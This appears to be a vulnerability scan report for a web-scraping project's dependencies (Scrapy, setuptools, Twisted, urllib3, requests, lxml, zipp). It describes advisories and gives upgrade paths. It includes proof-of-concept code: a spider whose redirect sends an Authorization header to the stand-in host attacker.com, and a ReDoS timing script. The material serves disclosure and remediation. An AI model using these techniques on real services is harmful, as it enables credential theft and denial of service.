ZoranPandovski/ProdirectScraper:requirements.txt

Vulnerabilities

20 via 35 paths

Dependencies

43

Source

GitHub

Commit

1ab18b20


high severity

Improper Resource Shutdown or Release

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.4.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the enforcement of response size limits only during the download of raw, usually-compressed response bodies and not during decompression. A malicious website being scraped could send a small response that, upon decompression, could exhaust the memory available to the process, potentially affecting any other process sharing that memory, and affecting disk usage in case of uncompressed response caching.
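
As a rough illustration of the decompression-bomb pattern described above (standard library only; the payload size is an arbitrary choice for the sketch), a size check applied to the compressed bytes says almost nothing about the memory needed to hold the decompressed body:

import zlib

# A highly repetitive payload compresses extremely well, so the body that
# travels over the network is tiny compared to what decompression allocates.
raw = b"A" * (50 * 1024 * 1024)        # 50 MB once decompressed
compressed = zlib.compress(raw, 9)     # what the server would actually send

print(f"compressed:   {len(compressed):,} bytes")
print(f"decompressed: {len(raw):,} bytes")
print(f"ratio:        {len(raw) / len(compressed):,.0f}x")

# A limit enforced only against len(compressed) is satisfied trivially,
# while decompressing the body still allocates the full 50 MB in memory.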

Remediation

Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.

References

high severity

Information Exposure Through Sent Data

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.1.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Information Exposure Through Sent Data due to the failure to remove the Authorization header when redirecting across domains. Exposure of the Authorization header to unauthorized actors can potentially lead to account hijacking.

PoC


import scrapy


class QuotesSpider(scrapy.Spider):
    name = "quotes"

    def start_requests(self):
        urls = [
            'http://mysite.com/redirect.php?url=http://attacker.com:8182/xx',
        ]
        for url in urls:
            # The Authorization header set here is followed across the redirect
            # to attacker.com in affected versions.
            yield scrapy.Request(
                url=url,
                cookies={'currency': 'USD', 'country': 'UY'},
                headers={'Authorization': 'Basic YWxhZGRpbjpvcGVuc2VzYW1l'},
                callback=self.parse,
            )

    def parse(self, response):
        page = response.url.split("/")[-2]
        filename = f'quotes-{page}.html'
        with open(filename, 'wb') as f:
            f.write(response.body)
        self.log(f'Saved file {filename}')

Remediation

Upgrade Scrapy to version 2.11.1 or higher.

References

high severity

Origin Validation Error

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.4.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Origin Validation Error due to the improper handling of the Authorization header during cross-domain redirects. An attacker can leak sensitive information by inducing the server to redirect a request with the Authorization header to a different domain.

Workarounds

1) Make sure the Authorization header is not used, either directly or through some third-party plugin.

2) If that header is needed for some requests, add dont_redirect: True to the request.meta dictionary of those requests to disable following redirects for them (see the sketch below).

3) If same-domain redirect support is needed for those requests, make sure you trust the target website not to redirect your requests to a different domain.
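
A minimal sketch of the second workaround; the URL and credentials are placeholders, not part of the advisory:

import scrapy

class AuthSpider(scrapy.Spider):
    name = "auth_example"

    def start_requests(self):
        # Disable redirect following only for the request that carries
        # credentials, so the Authorization header cannot be replayed
        # to another domain.
        yield scrapy.Request(
            url="https://api.example.com/private",
            headers={"Authorization": "Basic dXNlcjpwYXNz"},
            meta={"dont_redirect": True},
            callback=self.parse,
        )

    def parse(self, response):
        self.log(f"Got {response.status} from {response.url}")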

Remediation

Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@1.8.4.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the XMLFeedSpider class or any subclass that uses the default node iterator iternodes, as well as direct uses of the scrapy.utils.iterators.xmliter function. An attacker who controls a response being parsed can craft its content to cause extreme CPU and memory usage during parsing.

Note:

For versions 2.6.0 to 2.11.0, the vulnerable function is open_in_browser for a response without a base tag.

Workaround

  1. For XMLFeedSpider, switch the node iterator to xml or html (see the sketch below).
  2. For open_in_browser, before calling the function, either manually review the response content to rule out a ReDoS payload, or manually define the base tag so that open_in_browser does not add it automatically.
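
A minimal sketch of the first workaround, assuming a hypothetical feed URL and item tag:

from scrapy.spiders import XMLFeedSpider

class FeedSpider(XMLFeedSpider):
    name = "feed_example"
    start_urls = ["https://example.com/feed.xml"]

    # The default iterator is 'iternodes'; 'xml' (or 'html') parses the feed
    # through Selector objects instead of the regex-based streaming splitter.
    iterator = "xml"
    itertag = "item"

    def parse_node(self, response, node):
        yield {"title": node.xpath("title/text()").get()}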

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes about 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause regex engines to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behaviour and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade Scrapy to version 1.8.4, 2.11.1 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.1.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing content. An attacker who controls a response being parsed can craft its content to cause extreme CPU and memory usage during parsing.

PoC

import math
import re
import time

def convert_size(size_bytes):
    if size_bytes == 0:
        return "0B"
    size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    i = int(math.floor(math.log(size_bytes, 1024)))
    p = math.pow(1024, i)
    s = round(size_bytes / p, 2)
    return "%s %s" % (s, size_name[i])

END_TAG_RE = re.compile(r"<\s*/([^\s>]+)\s*>", re.S)

len_lists = [10000, 20000, 50000, 100000, 500000, 1000000]

for n in len_lists:
    st = time.time()
    header_end = '</' * n
    re.findall(END_TAG_RE, header_end)
    et = time.time()
    elapsed_time = et - st
    print(f'Execution time with len = {n} ~ {convert_size(len(header_end))}: {elapsed_time:.2f}s')

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes about 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause regex engines to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behaviour and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade Scrapy to version 2.11.1 or higher.

References

high severity

Improper Control of Generation of Code ('Code Injection')

  • Vulnerable module: setuptools
  • Introduced through: mock@2.0.0, twisted@23.8.0 and others

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a mock@2.0.0 pbr@6.1.1 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0 zope-interface@? setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 zope.interface@6.4.post2 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0 zope-interface@? setuptools@40.5.0

…and 1 more

Overview

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index module's download functions due to the unsafe usage of os.system. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.

Note

Because easy_install and package_index are deprecated, the exploitation surface is reduced, but it is conceivable that social engineering or a minor compromise of a package index could grant remote access.
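
A minimal illustration of the underlying bug class, not setuptools' actual code: when an attacker-controlled URL is pasted into a shell command, shell metacharacters in the URL become extra commands.

import shlex

url = "http://example.com/pkg.tar.gz; rm -rf ~"  # attacker-controlled value

# Vulnerable pattern (illustrative only, do not run):
#     os.system("wget " + url)
# The ';' inside the URL ends the wget command and runs 'rm -rf ~' as a
# second shell command.

# Safer: shell-quote untrusted values, or avoid the shell entirely by
# passing an argument list to subprocess.run().
print("unsafe command:", "wget " + url)
print("quoted command:", "wget -- " + shlex.quote(url))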

Remediation

Upgrade setuptools to version 70.0.0 or higher.

References

medium severity

HTTP Response Smuggling

  • Vulnerable module: twisted
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0
    Remediation: Upgrade to twisted@24.7.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Twisted is an event-based network programming and multi-protocol integration framework.

Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request. Information disclosure across sessions may also be possible for reverse proxy servers using pooled connections.

Workaround

This vulnerability can be avoided by enforcing HTTP/2, since only HTTP/1.x traffic is affected.

Remediation

Upgrade Twisted to version 24.7.0rc1 or higher.

References

medium severity

Infinite loop

  • Vulnerable module: zipp
  • Introduced through: twisted@23.8.0 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to twisted@23.8.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 service-identity@21.1.0 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to scrapy@1.8.4.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to scrapy@1.8.2.

Overview

Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path module, such as joinpath, the overloaded division operator, and iterdir.
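
A minimal sketch of the affected zipp.Path surface; it only demonstrates joinpath, the / operator and iterdir on a well-formed archive, and does not reproduce the reported loop, which requires a specially crafted entry name:

import io
import zipfile
import zipp

# Build a small, well-formed archive in memory.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("data/hello.txt", "hello")

# zipp.Path gives the archive a pathlib-like interface; the reported loop is
# reachable through joinpath, the '/' operator and iterdir.
root = zipp.Path(zipfile.ZipFile(buf))
data_dir = root / "data"              # equivalent to root.joinpath("data")
for entry in data_dir.iterdir():
    print(entry.name, entry.read_text())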

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Upgrade zipp to version 3.19.1 or higher.

References

medium severity

Files or Directories Accessible to External Parties

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.2.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Files or Directories Accessible to External Parties via the DOWNLOAD_HANDLERS setting. An attacker can redirect traffic to unintended protocols such as file:// or s3://, potentially accessing sensitive data or credentials by manipulating the start URLs of a spider and observing the output.

Notes (see also the hardening sketch below):

  1. HTTP redirects should only work between URLs that use the http:// or https:// schemes.

  2. A malicious actor, given write access to the start requests of a spider and read access to the spider output, could exploit this vulnerability to:

     a) Redirect to any local file using the file:// scheme to read its contents.

     b) Redirect to an ftp:// URL of a malicious FTP server to obtain the FTP username and password configured in the spider or project.

     c) Redirect to any s3:// URL to read its content using the S3 credentials configured in the spider or project.

  3. A spider that always outputs the entire contents of a response would be completely vulnerable.

  4. A spider that extracts only fragments from the response could significantly limit the exposed data.
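
Until the upgrade is applied, one hardening option, an assumption rather than an official workaround from the advisory, is to disable the URL schemes a project does not need; Scrapy skips any scheme whose entry in DOWNLOAD_HANDLERS is mapped to None:

# settings.py -- keep only the URL schemes this project actually needs.
# Scrapy disables a handler whose scheme is mapped to None; http/https
# keep their default handlers.
DOWNLOAD_HANDLERS = {
    "file": None,  # block file:// so a redirect cannot read local files
    "ftp": None,   # block ftp:// so configured FTP credentials cannot be coaxed out
    "s3": None,    # block s3:// so configured AWS credentials cannot be used
}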

Remediation

Upgrade Scrapy to version 2.11.2 or higher.

References

medium severity

Improper Removal of Sensitive Information Before Storage or Transfer

  • Vulnerable module: urllib3
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests@2.31.0 urllib3@2.0.7
    Remediation: Upgrade to scrapy@2.0.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests-file@2.1.0 requests@2.31.0 urllib3@2.0.7
    Remediation: Upgrade to scrapy@2.0.0.

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization header during cross-origin redirects when ProxyManager is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.

Notes:

To be vulnerable, the application must be doing all of the following:

  1. Setting the Proxy-Authorization header without using urllib3's built-in proxy support.

  2. Not disabling HTTP redirects (e.g. with redirects=False)

  3. Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.

Workarounds

  1. Using the Proxy-Authorization header with urllib3's ProxyManager (see the sketch below).

  2. Disabling HTTP redirects using redirects=False when sending requests.

  3. Not using the Proxy-Authorization header.
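
A minimal sketch of the first workaround; the proxy address and credentials are placeholders. Note that the redirect switch in urllib3's request() is spelled redirect:

import urllib3

# Let urllib3 attach the proxy credentials itself instead of setting the
# Proxy-Authorization header manually on every request.
proxy = urllib3.ProxyManager(
    "http://proxy.example.com:3128",
    proxy_headers=urllib3.make_headers(proxy_basic_auth="user:secret"),
)

resp = proxy.request("GET", "https://example.org/", redirect=False)
print(resp.status)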

Remediation

Upgrade urllib3 to version 1.26.19, 2.2.2 or higher.

References

medium severity

Exposure of Sensitive Information to an Unauthorized Actor

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.2.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor due to improper handling of HTTP headers during cross-origin redirects. An attacker can intercept the Authorization header and potentially access sensitive information by exploiting this misconfiguration in redirect scenarios where the domain remains the same but the scheme or port changes.

Note: In the context of a man-in-the-middle attack, this could be used to get access to the value of that Authorization header.

Remediation

Upgrade Scrapy to version 2.11.2 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.6.0.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to Information Exposure in which a spider could leak cookie headers when a request is forwarded to a third-party, potentially attacker-controlled, website.

Remediation

Upgrade Scrapy to version 2.6.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: setuptools
  • Introduced through: mock@2.0.0, twisted@23.8.0 and others

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a mock@2.0.0 pbr@6.1.1 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a twisted@23.8.0 zope-interface@? setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 zope.interface@6.4.post2 setuptools@40.5.0
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 twisted@23.8.0 zope-interface@? setuptools@40.5.0

…and 1 more

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via a crafted HTML package or a custom PackageIndex page.

Note:

Only a small portion of the user base is impacted by this flaw. Setuptools maintainers pointed out that package_index is deprecated (not formally, but “in spirit”) and the vulnerability isn't reachable through standard, recommended workflows.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes about 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String              Number of C's   Number of steps
ACCCX               3               38
ACCCCX              4               71
ACCCCCX             5               136
ACCCCCCCCCCCCCCX    14              65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause regex engines to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behaviour and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade setuptools to version 65.5.1 or higher.

References

medium severity

Always-Incorrect Control Flow Implementation

  • Vulnerable module: requests
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests@2.31.0
    Remediation: Upgrade to scrapy@2.0.0.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests-file@2.1.0 requests@2.31.0
    Remediation: Upgrade to scrapy@2.0.0.

Overview

Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.

Notes:

  1. For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.

  2. For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used (see the sketch below).

  3. This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.
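
A minimal sketch of the second note for requests < 2.32.0; the URLs are placeholders:

import requests

# If a verify=False request is unavoidable, confine it to its own Session and
# close that Session so the unverified connection is never reused.
session = requests.Session()
session.get("https://self-signed.internal.example/health", verify=False)
session.close()

# Later requests on a fresh Session verify certificates as usual.
with requests.Session() as clean:
    resp = clean.get("https://api.example.com/data")  # verify defaults to True
    print(resp.status_code)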

Remediation

Upgrade requests to version 2.32.2 or higher.

References

medium severity

NULL Pointer Dereference

  • Vulnerable module: lxml
  • Introduced through: lxml@4.6.5 and scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a lxml@4.6.5
    Remediation: Upgrade to lxml@4.9.1.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 lxml@4.6.5
    Remediation: Upgrade to scrapy@1.8.4.
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 parsel@1.8.1 lxml@4.6.5

Overview

Affected versions of this package are vulnerable to NULL Pointer Dereference in the iterwalk() function (used by canonicalize) that can be triggered by malicious input.

NOTE: This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Upgrade lxml to version 4.9.1 or higher.

References

medium severity

Credential Exposure

